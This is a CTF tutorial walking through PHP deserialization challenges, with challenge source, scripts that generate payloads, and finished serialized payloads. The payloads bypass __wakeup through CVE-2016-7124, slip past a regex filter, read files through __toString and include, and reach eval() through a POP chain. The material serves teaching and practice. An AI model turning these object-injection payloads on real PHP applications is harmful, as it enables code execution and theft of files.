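CTF_Web: Deserialization in Detail (Part 2): Analysis of Classic CTF Challenges

0x00 Deserialization challenges in CTF

Challenges of this kind mainly revolve around bypassing or triggering the magic methods involved in deserialization: you craft a serialized string that satisfies the conditions and makes the code do something specific. To do that you need a clear picture of the execution flow of the whole piece of code. Let's start with the simplest case.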

0x01 攻防世界 unserialize3

The source shown by the challenge is:

class xctf{ 
    public $flag = '111';
    public function __wakeup(){
    exit('bad requests');
}
?code=

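Only one magic method appears here. __wakeup() is called by unserialize() right after the object has been rebuilt, so whatever we pass in, __wakeup() runs and the script exits. However, __wakeup() is affected by a known vulnerability, CVE-2016-7124 (PHP before 5.6.25 and 7.x before 7.0.10): if the property count declared in the serialized string is larger than the number of properties actually present, __wakeup() is skipped. The class here has a single property, $flag, so declaring 2 properties in the serialized string bypasses the check.
First generate the normal serialized string: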

<?php
class xctf{ 
    public $flag = '111';
}
$a = new xctf();
echo serialize($a);

This prints O:4:"xctf":1:{s:4:"flag";s:3:"111";}. Change the property count after the class name xctf from 1 to 2, submit the string as code, and the flag is returned.
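The manual edit described above can also be scripted. The following is a minimal sketch that only builds the payload string; the variable names are illustrative, and the local xctf class deliberately omits __wakeup() so the script runs on any PHP version.

```php
<?php
// Local copy of the class, used only to generate the serialized string.
class xctf {
    public $flag = '111';
}

$serialized = serialize(new xctf());

// Declare 2 properties although only 1 follows; on PHP versions affected by
// CVE-2016-7124 this mismatch makes unserialize() skip __wakeup().
$payload = str_replace('"xctf":1:', '"xctf":2:', $serialized);

echo $payload, PHP_EOL;                        // O:4:"xctf":2:{s:4:"flag";s:3:"111";}
echo '?code=' . urlencode($payload), PHP_EOL;  // query string to send
```

URL-encoding the payload is optional for this particular string, but it avoids surprises with quotes and braces in the query string.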

0x02 攻防世界 Web_php_unserialize

The challenge source is:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

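Start by auditing the code, which is fairly simple. Experienced players will see at a glance that we only need to bypass the preg_match check and the __wakeup method: __wakeup resets file in the object being deserialized to index.php, which would just bring us back to the current page.
First, the regex: /[oc]:\d+:/i
It matches, case-insensitively, an o or c followed by a colon, one or more digits, and another colon, i.e. the O:4: prefix of a serialized object. We bypass it by writing +4 instead of 4. The + breaks the \d+ match, but the value is unchanged: the old PHP version this challenge runs on parses +4 as 4, so the deserialized result is the same.
Second, __wakeup: just change the property count in the serialized string from 1 to a larger number. Note that file is private, so the serialized string contains invisible NUL bytes (written as %00 below). Do not copy the printed string and base64-encode it by hand, because the NUL bytes get lost and the result will differ; encode it in the same script.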
O:+4:"Demo":2:{s:10:"%00Demo%00file";s:8:"fl4g.php";}

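// Demo is the class from the challenge source above.
$a = new Demo('fl4g.php');
$b = serialize($a);
$b = str_replace('O:4', 'O:+4', $b); // slip past the /[oc]:\d+:/i filter
$b = str_replace(':1:', ':2:', $b);  // declare one property too many to skip __wakeup
echo base64_encode($b);              // encode in the same script so the NUL bytes survive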

The final request is: index.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
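Both details can be checked locally without deserializing anything. The sketch below assumes a stripped-down local Demo class (no destructor or __wakeup) and illustrative variable names. It shows that the filter regex misses the O:+4: form and that the private property name is stored with NUL bytes, which is why its declared length is 10.

```php
<?php
// Stripped-down local copy: only the private property matters for serialization.
class Demo {
    private $file = 'fl4g.php';
}

$filter  = '/[oc]:\d+:/i';
$normal  = serialize(new Demo());
$payload = str_replace('O:4', 'O:+4', $normal);   // defeat the regex
$payload = str_replace(':1:', ':2:', $payload);   // inflate the property count

$normalBlocked  = preg_match($filter, $normal);   // 1: "O:4:" is caught
$payloadBlocked = preg_match($filter, $payload);  // 0: "O:+4:" is not

// A private property is stored as "\0ClassName\0property".
$privateName = "\0Demo\0file";

echo 'normal blocked:  ', $normalBlocked, PHP_EOL;
echo 'payload blocked: ', $payloadBlocked, PHP_EOL;
echo 'name length:     ', strlen($privateName), PHP_EOL;
echo base64_encode($payload), PHP_EOL;
```

The base64 line printed at the end should match the var value used in the final request.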

0x03 XMAN2017 unserialize

Visiting the challenge shows a hint to pass a GET parameter named code.

So try passing 1, which returns the hint
hint: flag.php
Visiting it gives the next hint:

Visit help.php to get part of the source:

After tidying up, the code is:

<?php
class FileClass
{
    public $filename = 'error.log';
    public function __toString(){
        return file_get_contents($this->filename);
    }
}

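So this challenge is about triggering __toString. As covered earlier, this method fires when an object is used as a string, typically by echo or another printing function. First, generate a test string with: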

$a = new FileClass();
echo serialize($a);

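Passing this to code as a test returns:

In other words, the server prints the object after deserializing it, which triggers __toString and returns the file's contents. There is simply no error.log on the server, so we replace the filename with flag.php.
Pass ?code=O:9:"FileClass":1:{s:8:"filename";s:8:"flag.php";} and view the page source to get the flag.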
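The behaviour can be reproduced locally. The sketch below assumes the server does something equivalent to echoing the deserialized object (its real code is not shown in the challenge), and it reads a temporary file with made-up content instead of flag.php.

```php
<?php
class FileClass {
    public $filename = 'error.log';
    public function __toString() {
        return (string) file_get_contents($this->filename);
    }
}

// Stand-in for flag.php: a temporary file with known content.
$tmp = tempnam(sys_get_temp_dir(), 'demo');
file_put_contents($tmp, 'demo-flag');

// Same shape as the challenge payload, with the filename swapped in.
$payload = sprintf('O:9:"FileClass":1:{s:8:"filename";s:%d:"%s";}', strlen($tmp), $tmp);

$obj    = unserialize($payload);
$output = (string) $obj;      // string context triggers __toString, like echo would

echo $output, PHP_EOL;        // demo-flag
unlink($tmp);
```

The length prefix (s:%d) must equal the byte length of the filename, which is why the payload for flag.php uses s:8.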

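0x04 POP chain construction

Part of the code below comes from F12sec, written by spaceman. Thanks for sharing. We'll use a few examples to study the execution flow of deserialization.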

<?php
highlight_file(__FILE__);
class pop {
    public $ClassObj;
    function __construct() {
        $this->ClassObj = new hello();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class hello {
    function action() {
        echo "hello pop ";
    }
}
class shell {
    public $data;
    function action() {
        eval($this->data);
    }
}
$a = new pop();
@unserialize($_GET['s']);

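In this code the dangerous sink is clearly the action method of the shell class. The first class, pop, creates a hello object when constructed and calls that object's action method when destroyed. We only need to abuse this automatic call on destruction to change the flow from the first line below to the second:
new pop --> new hello --> action(hello)
new pop --> new shell --> action(shell)
So the code above becomes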

<?php
highlight_file(__FILE__);
class pop {
    public $ClassObj;
    function __construct() {
        $this->ClassObj = new shell();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class hello {
    function action() {
        echo "hello pop ";
    }
}
class shell {
    public $data ="phpinfo();" ;
    function action() {
        eval($this->data);
    }
}
$a = new pop();
echo serialize($a);

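That changes the execution flow. The modified class is only used locally to generate the string: the server still runs the original code, and unserialize fills ClassObj from our string without calling __construct. Pass the result O:3:"pop":1:{s:8:"ClassObj";O:5:"shell":1:{s:4:"data";s:10:"phpinfo();";}} as s, and the page shows the output of phpinfo(), confirming that the flow was hijacked.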
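Because a serialized string carries only class names and property values, the same payload can be produced without editing any constructor. The sketch below is one way to do it, assuming bare local copies of the two classes (no methods, so nothing runs when the script ends).

```php
<?php
// Bare local copies: only the class names and public properties matter.
class pop {
    public $ClassObj;
}
class shell {
    public $data;
}

$sink = new shell();
$sink->data = 'phpinfo();';   // code the target's eval() would run

$entry = new pop();
$entry->ClassObj = $sink;     // swap hello for shell

$payload = serialize($entry);
echo $payload, PHP_EOL;
echo '?s=' . urlencode($payload), PHP_EOL;
```

This prints the same string as the modified script above, which shows that the constructor change was only a convenience for generating it.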

0x05 MRCTF2020 Ezpop

The challenge source is:

<?php

class Modifier {
    protected  $var = "flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        echo "__invoke";
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        echo "__tostring";
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier();
    }

    public function __get($key){
        echo "__get";
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

The code is longer, but we'll go through it piece by piece; everything in it was covered earlier.

First, the Modifier class:

class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

It has a single magic method, __invoke. As summarized earlier, __invoke runs when an object is called like a function, so the way to trigger Modifier is:

$a = new Modifier();
$a();
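As a harmless illustration of the same trigger, the sketch below uses a hypothetical Greeter class in place of Modifier, so nothing is included from disk.

```php
<?php
// Hypothetical stand-in for Modifier: same shape, harmless body.
class Greeter {
    protected $var = 'world';
    public function __invoke() {
        return 'hello ' . $this->var;
    }
}

$a = new Greeter();
$result = $a();                 // calling the object like a function runs __invoke

echo $result, PHP_EOL;          // hello world
var_dump(is_callable($a));      // bool(true)
```

Any object whose class defines __invoke counts as callable, which is what lets a later step of a chain call it through a plain variable.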

Next, the Show class:

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

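The magic methods here are __toString and __wakeup. __toString needs the object to be used as a string. Locally, the echo in __construct does that when $file is itself a Show object; on the target, unserialize does not call __construct, but the preg_match in __wakeup treats $this->source as a string, which has the same effect. The filter in __wakeup only rewrites source when it matches one of the listed keywords.

Third, the Test class: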

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

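The magic method __get in Test is called when we read an inaccessible or nonexistent property, and it calls the value of its own p property as a function.
The way to trigger it is: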

$b = new Test();
$b->a;

Where do we get a read of a nonexistent property? Show's __toString reads $this->str->source, and Test has no source property, so we just make Show's str property a Test object.
That is:

$a = new Show("123");
$a->str = new Test();

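At this point the picture is clear: we are back at the trigger condition of the first class, Modifier, which is calling a value as a function. The final goal is to get the file we want to read included by include($value) in Modifier.
So the execution flow is:
Show runs __toString --> it reads source on the Test object --> Test has no source --> __get runs --> $this->p is called as a function, so $this->p should be a Modifier object, whose __invoke includes the target file.
The code is: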

<?php

class Modifier {
    protected  $var = "flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        echo "__invoke";
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        echo "__tostring";
        return "556"; // Changed from $this->str->source for local payload generation only; otherwise the second new Show() below fires the chain locally and fails with "Method Show::__toString() must return a string value"
    }

    public function __wakeup(){  // Neither source value matches the regex, so the filter never rewrites source.
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier();
    }

    public function __get($key){
        echo "__get";
        $function = $this->p;
        return $function();
    }
}
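$a = new Show("afcc"); // Any value that passes the filter works here; it does not affect the result.
$a->str = new Test();
// echo $a; The point is that a second Show must use $a as a string for __toString to fire.
$c = new Show($a);
echo urlencode(serialize($c)); // urlencode keeps the NUL bytes in the protected property name (\0*\0var) intact.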

The final input is
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A4%3A%22afcc%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
which is the URL-encoded serialized string. Note the %00 bytes on both sides of the * in front of var.
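To watch the chain fire during unserialize without touching any file, the sketch below rebuilds the same object graph from harmless stand-ins. Entry, Bridge, Sink and Trace are hypothetical names playing the roles of Show, Test, Modifier and a log; the regex is shortened, and Sink returns a string instead of calling include.

```php
<?php
// Hypothetical stand-ins for the challenge classes; nothing is included from disk.
final class Trace {
    public static $log = [];
}

class Sink {                       // role of Modifier
    protected $var = 'target';
    public function __invoke() {
        Trace::$log[] = '__invoke(' . $this->var . ')';
        return 'done';             // a string, so __toString stays valid
    }
}

class Bridge {                     // role of Test
    public $p;
    public function __get($key) {
        Trace::$log[] = '__get(' . $key . ')';
        $function = $this->p;
        return $function();
    }
}

class Entry {                      // role of Show
    public $source;
    public $str;
    public function __toString() {
        Trace::$log[] = '__toString';
        return $this->str->source; // Bridge has no source, so __get runs
    }
    public function __wakeup() {
        // preg_match needs a string, so an object in source is converted
        // through its __toString method.
        preg_match('/gopher|http/i', $this->source);
    }
}

$inner = new Entry();
$inner->source = 'afcc';
$inner->str = new Bridge();
$inner->str->p = new Sink();

$outer = new Entry();
$outer->source = $inner;           // outer's __wakeup will stringify $inner

$payload = serialize($outer);
Trace::$log = [];
unserialize($payload);             // __construct is never called here

echo implode(' --> ', Trace::$log), PHP_EOL;
// __toString --> __get(source) --> __invoke(target)
```

The trace shows that on the deserializing side the string context comes from the preg_match call in __wakeup, and the remaining steps follow the flow described above.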

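Looking back once the challenge is solved, the filter in __wakeup never gets in our way: the final serialized string does not rely on source holding any blacklisted keyword, so even if source were reset it would not change the outcome. (The preg_match call itself is still what uses source as a string on the server.) If the body of __wakeup were changed to

$this->str = "index.php";

then we would have to think about how to bypass it.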

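0x06 Summary

After a few days of studying deserialization, I found that the key points are when each magic method is called, how to bypass regex filters, and how to build POP chains. Progress is slow and takes steady accumulation.
When building a POP chain:

First, analyze whether each method offers something exploitable and how to use it, for example magic methods such as __wakeup and __get.
Then check whether they are connected, for example whether the trigger condition of the first is exactly what the second one sets up.
Finally, work backwards from the dangerous function we need to control, such as eval or include.

More practice is still needed to master this properly.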